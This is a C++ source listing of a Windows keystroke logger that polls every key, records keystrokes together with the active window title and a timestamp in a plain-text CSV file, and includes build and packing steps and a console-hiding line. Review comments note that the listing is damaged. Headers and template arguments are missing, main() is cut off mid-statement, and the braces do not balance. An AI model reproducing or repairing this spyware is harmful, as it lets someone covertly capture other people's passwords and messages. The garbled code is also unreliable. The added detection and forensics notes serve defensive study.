//~ Copyright 2009 16 Systems. All rights reserved.

//~ This is a very basic yet fully functional Windows keystroke logger.
//~ It is intended for education purposes only.

//~ NOTE(review): this listing was damaged in extraction. The header names
//~ after the bare #include directives and the template arguments of
//~ std::map / std::vector are missing, and part of main() is lost (marked
//~ below). The code is reproduced as shown and does not compile in this form.

#include
#include
#include
#include
#include
#include "boost/date_time/posix_time/posix_time.hpp"
#include "boost/date_time/local_time/local_time.hpp"

//~ Build like this on Windows XP, Vista or Windows 7
//~ This assumes you have mingw and msys and boost installed
//~ The stripping and packing are optional
//~ --------------------------
//~ g++ -static -Os 16k.cpp -o 16k.exe \
//~ -Ic://Boost/include/boost-1_40 \
//~ c://Boost/lib/libboost_date_time-mgw34-s.lib
//~ strip 16k.exe
//~ upx 16k.exe
//~ --------------------------

//~ vk(): builds and returns the lookup table used by main(). Each entry maps
//~ a numeric virtual-key code to two labels: index 0 is written for the
//~ unshifted key, index 1 for the shifted key. Entries created with the
//~ (2, "...") constructor carry the same label in both positions.
//~ The table size is printed to stdout before returning.
std::map > vk()
{
    //~ http://msdn.microsoft.com/en-us/library/ms645540%28VS.85%29.aspx
    //~ http://vmd.myxomop.com/apires/ref/g/getasynckeystate.html

    std::map > k;

    // Mouse buttons and editing keys (codes 1-9).
    std::vector k1(2, " LM "); // Left Mouse Button
    k[1] = k1;
    std::vector k2(2, " RM "); // Right Mouse Button
    k[2] = k2;
    std::vector k4(2, " MM "); // Middle Mouse Button
    k[4] = k4;
    std::vector k8(2, " BS "); // Backspace
    k[8] = k8;
    std::vector k9(2, " TAB "); // Tab
    k[9] = k9;

    // Control and modifier keys (codes 12-20).
    std::vector k12; k12.push_back(" clear "); k12.push_back(" CLEAR "); k[12] = k12;
    std::vector k13; k13.push_back(" enter "); k13.push_back(" ENTER "); k[13] = k13;
    // The Shift key: both labels are empty, so a Shift event adds no text of its own.
    std::vector k16; k16.push_back(""); k16.push_back(""); k[16] = k16; // The Shift Key
    std::vector k17; k17.push_back(" ctrl "); k17.push_back(" CTRL "); k[17] = k17;
    std::vector k18; k18.push_back(" alt "); k18.push_back(" ALT "); k[18] = k18;
    std::vector k19; k19.push_back(" pause "); k19.push_back(" PAUSE "); k[19] = k19;
    std::vector k20; k20.push_back(" caps "); k20.push_back(" CAPS "); k[20] = k20;

    std::vector k32; k32.push_back(" "); k32.push_back(" "); k[32] = k32; //0x20 This is the space bar

    // Top-row digits (codes 48-57, 0x30-0x39). The shifted labels are the
    // symbols of a US layout -- presumably the author's keyboard; other layouts differ.
    std::vector k48; k48.push_back("0"); k48.push_back(")"); k[48] = k48; //0x30
    std::vector k49; k49.push_back("1"); k49.push_back("!"); k[49] = k49;
    std::vector k50; k50.push_back("2"); k50.push_back("@"); k[50] = k50;
    std::vector k51; k51.push_back("3"); k51.push_back("#"); k[51] = k51;
    std::vector k52; k52.push_back("4"); k52.push_back("$"); k[52] = k52;
    std::vector k53; k53.push_back("5"); k53.push_back("%"); k[53] = k53;
    std::vector k54; k54.push_back("6"); k54.push_back("^"); k[54] = k54;
    std::vector k55; k55.push_back("7"); k55.push_back("&"); k[55] = k55;
    std::vector k56; k56.push_back("8"); k56.push_back("*"); k[56] = k56;
    std::vector k57; k57.push_back("9"); k57.push_back("("); k[57] = k57; //0x39

    // Letters (codes 65-90, 0x41-0x5A): lowercase at index 0, uppercase at index 1.
    std::vector k65; k65.push_back("a"); k65.push_back("A"); k[65] = k65; //0x41
    std::vector k66; k66.push_back("b"); k66.push_back("B"); k[66] = k66;
    std::vector k67; k67.push_back("c"); k67.push_back("C"); k[67] = k67;
    std::vector k68; k68.push_back("d"); k68.push_back("D"); k[68] = k68;
    std::vector k69; k69.push_back("e"); k69.push_back("E"); k[69] = k69;
    std::vector k70; k70.push_back("f"); k70.push_back("F"); k[70] = k70;
    std::vector k71; k71.push_back("g"); k71.push_back("G"); k[71] = k71; //0x47
    std::vector k72; k72.push_back("h"); k72.push_back("H"); k[72] = k72;
    std::vector k73; k73.push_back("i"); k73.push_back("I"); k[73] = k73;
    std::vector k74; k74.push_back("j"); k74.push_back("J"); k[74] = k74;
    std::vector k75; k75.push_back("k"); k75.push_back("K"); k[75] = k75;
    std::vector k76; k76.push_back("l"); k76.push_back("L"); k[76] = k76;
    std::vector k77; k77.push_back("m"); k77.push_back("M"); k[77] = k77;
    std::vector k78; k78.push_back("n"); k78.push_back("N"); k[78] = k78;
    std::vector k79; k79.push_back("o"); k79.push_back("O"); k[79] = k79;
    std::vector k80; k80.push_back("p"); k80.push_back("P"); k[80] = k80;
    std::vector k81; k81.push_back("q"); k81.push_back("Q"); k[81] = k81;
    std::vector k82; k82.push_back("r"); k82.push_back("R"); k[82] = k82;
    std::vector k83; k83.push_back("s"); k83.push_back("S"); k[83] = k83;
    std::vector k84; k84.push_back("t"); k84.push_back("T"); k[84] = k84;
    std::vector k85; k85.push_back("u"); k85.push_back("U"); k[85] = k85;
    std::vector k86; k86.push_back("v"); k86.push_back("V"); k[86] = k86;
    std::vector k87; k87.push_back("w"); k87.push_back("W"); k[87] = k87;
    std::vector k88; k88.push_back("x"); k88.push_back("X"); k[88] = k88;
    std::vector k89; k89.push_back("y"); k89.push_back("Y"); k[89] = k89;
    std::vector k90; k90.push_back("z"); k90.push_back("Z"); k[90] = k90; //0x5A

    // Codes 96-111: same label for both shift states (numeric keypad block).
    std::vector k96(2, "0");
    std::vector k97(2, "1");
    std::vector k98(2, "2");
    std::vector k99(2, "3");
    std::vector k100(2, "4");
    std::vector k101(2, "5");
    std::vector k102(2, "6");
    std::vector k103(2, "7");
    std::vector k104(2, "8");
    std::vector k105(2, "9");
    std::vector k106(2, "*");
    std::vector k107(2, "+");
    std::vector k108(2, " Separator_key ");
    std::vector k109(2, "-");
    std::vector k110(2, ".");
    std::vector k111(2, "/");

    k[96] = k96;
    k[97] = k97;
    k[98] = k98;
    k[99] = k99;
    k[100] = k100;
    k[101] = k101;
    k[102] = k102;
    k[103] = k103;
    k[104] = k104;
    k[105] = k105;
    k[106] = k106;
    k[107] = k107;
    k[108] = k108;
    k[109] = k109;
    k[110] = k110;
    k[111] = k111;

    // Punctuation keys (codes 186-192 and 219-222); labels again look US-layout specific.
    std::vector k186; k186.push_back(";"); k186.push_back(":"); k[186] = k186;
    std::vector k187; k187.push_back("="); k187.push_back("+"); k[187] = k187;
    std::vector k188; k188.push_back(","); k188.push_back("<"); k[188] = k188;
    std::vector k189; k189.push_back("-"); k189.push_back("_"); k[189] = k189;
    std::vector k190; k190.push_back("."); k190.push_back(">"); k[190] = k190;
    std::vector k191; k191.push_back("/"); k191.push_back("?"); k[191] = k191; //0xBF
    std::vector k192; k192.push_back("`"); k192.push_back("~"); k[192] = k192;
    std::vector k219; k219.push_back("["); k219.push_back("{"); k[219] = k219;
    std::vector k220; k220.push_back("\\"); k220.push_back("|"); k[220] = k220;
    std::vector k221; k221.push_back("]"); k221.push_back("}"); k[221] = k221;
    std::vector k222; k222.push_back("'"); k222.push_back("\""); k[222] = k222; //0xDE

    // Startup artifact: the number of table entries is written to stdout.
    std::cout << k.size() << std::endl;

    return k;
}

//~ main(): polling loop. On every pass it reads the foreground window handle,
//~ then for each table entry calls GetAsyncKeyState and GetWindowText, and on a
//~ reported key-state change writes one tab-separated record to stdout and to
//~ the file "16k.csv".
//~
//~ Review note (detection / forensics), from what the listing shows:
//~  - No keyboard hook is installed in the visible code; the observable
//~    behaviour is a process calling GetAsyncKeyState across the whole key
//~    table, together with GetForegroundWindow/GetWindowText, with a 15 ms
//~    sleep between passes.
//~  - "16k.csv" is opened by relative path, so it lands in the process working
//~    directory. It holds key labels and window titles in plain text and
//~    should be handled as sensitive evidence.
//~  - The loop has no exit condition in the visible code, so the close() and
//~    return after it are not reached.
int main()
{
    // Hide the windows console (may be a better way to do this?)
    //FreeConsole();

    std::map > k = vk();
    std::map >::iterator kiter;

    //----------------------------------------------------------------------------------------

    // Output file, truncated/created on start; the first line is the column header.
    std::ofstream opfile("16k.csv", std::ios::out);
    opfile << "Key_Word" << "\t" << "Active_Window" << "\t" << "Micro_Seconds" << "\t" << "Key_State" << "\t" << "Time" << std::endl;

    //----------------------------------------------------------------------------------------

    HWND currenthwnd;

    // This is required. std::string will not work here.
    // GetWindowText below is given the same 2048 as its maximum count.
    char window_title[2048];

    // 'one' holds the time of the previous key-state change, 'two' the current sample time.
    boost::posix_time::ptime one = boost::posix_time::microsec_clock::local_time();
    boost::posix_time::ptime two = boost::posix_time::microsec_clock::local_time();

    std::string state;   // label of the last key that was logged
    std::string word;    // labels accumulated since start (flushing is in the lost part of the listing)
    long time_state;     // written below, never read in the visible code
    bool shift;          // set when Shift is seen held during the current pass
    int ks;              // raw GetAsyncKeyState result

    while (1)
    {
        shift = false;
        currenthwnd = GetForegroundWindow();

        for( kiter = k.begin(); kiter != k.end(); ++kiter )
        {
            two = boost::posix_time::microsec_clock::local_time();
            ks = GetAsyncKeyState(kiter->first);
            // The title is re-read for every table entry, not once per pass.
            GetWindowText(currenthwnd, window_title, 2048);

            time_t rawtime;
            time ( &rawtime );
            tm *t = localtime( &rawtime );

            // Shift key is being pressed and held down.
            // -32768 is the 16-bit value 0x8000: per the GetAsyncKeyState documentation the
            // high bit alone means "key is currently down".
            if ( ks == -32768 && kiter->first == 16)
            {
                shift = true;
            }

            // Key state has changed.
            // -32767 is 0x8001: key down and the low "pressed since the previous call" bit set.
            if ( ks == -32767 )
            {
                boost::posix_time::time_duration td = two - one;

                // When a key is pressed and held, only log it once.
                // An event is dropped when it carries the same label as the last logged key
                // and arrives within 46875 microseconds of the previous state change.
                if (td.total_microseconds() <= 46875 && (kiter->second[0] == state || kiter->second[1] == state) )
                {
                    //std::cout << kiter->second << "\tREPEAT\t" << td.total_microseconds() << std::endl;
                    //opfile << kiter->second << "\tREPEAT\t" << td.total_microseconds() << std::endl;
                    ;
                }

                else
                {
                    // The user pressed the enter key
                    if ( kiter->second[0] == " enter ")
                    {
                        // NOTE(review): the listing is truncated inside the next statement -- the
                        // text between '<' and 'second[1]' was lost in extraction. The rest of the
                        // Enter branch and the opening of the branch that writes second[1]
                        // (presumably the shifted case -- confirm against an intact copy) are
                        // missing, so the braces below do not balance as shown.
                        std::cout << word << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) <second[1] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) << std::endl;
                        // Record layout: label, window title, microseconds since the previous
                        // state change, raw key state, local time. asctime() text already ends
                        // in '\n', so with std::endl each record is followed by an empty line;
                        // std::endl also flushes the stream after every record.
                        opfile << kiter->second[1] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t"<< asctime(t) << std::endl;
                        word.append( kiter->second[1] );
                        state = kiter->second[1];
                    }

                    // Lowercase
                    else
                    {
                        std::cout << kiter->second[0] << "\t" << window_title << "\t" << td.total_microseconds() << "\t" << ks << "\t" << asctime(t) << std::endl;
                        opfile << kiter->second[0] << "\t" << window_title << "\t" << td.total_microseconds() << "\t"<< ks << "\t" << asctime(t) << std::endl;
                        word.append( kiter->second[0] );
                        state = kiter->second[0];
                    }
                }
            }

            // Only a key-state change moves the reference time forward.
            one = two;
            time_state = td.total_microseconds();
        }
    }

    // Pause between polling passes (15 ms).
    Sleep(15);
}

//----------------------------------------------------------------------------------------

opfile.close();
return 0;
}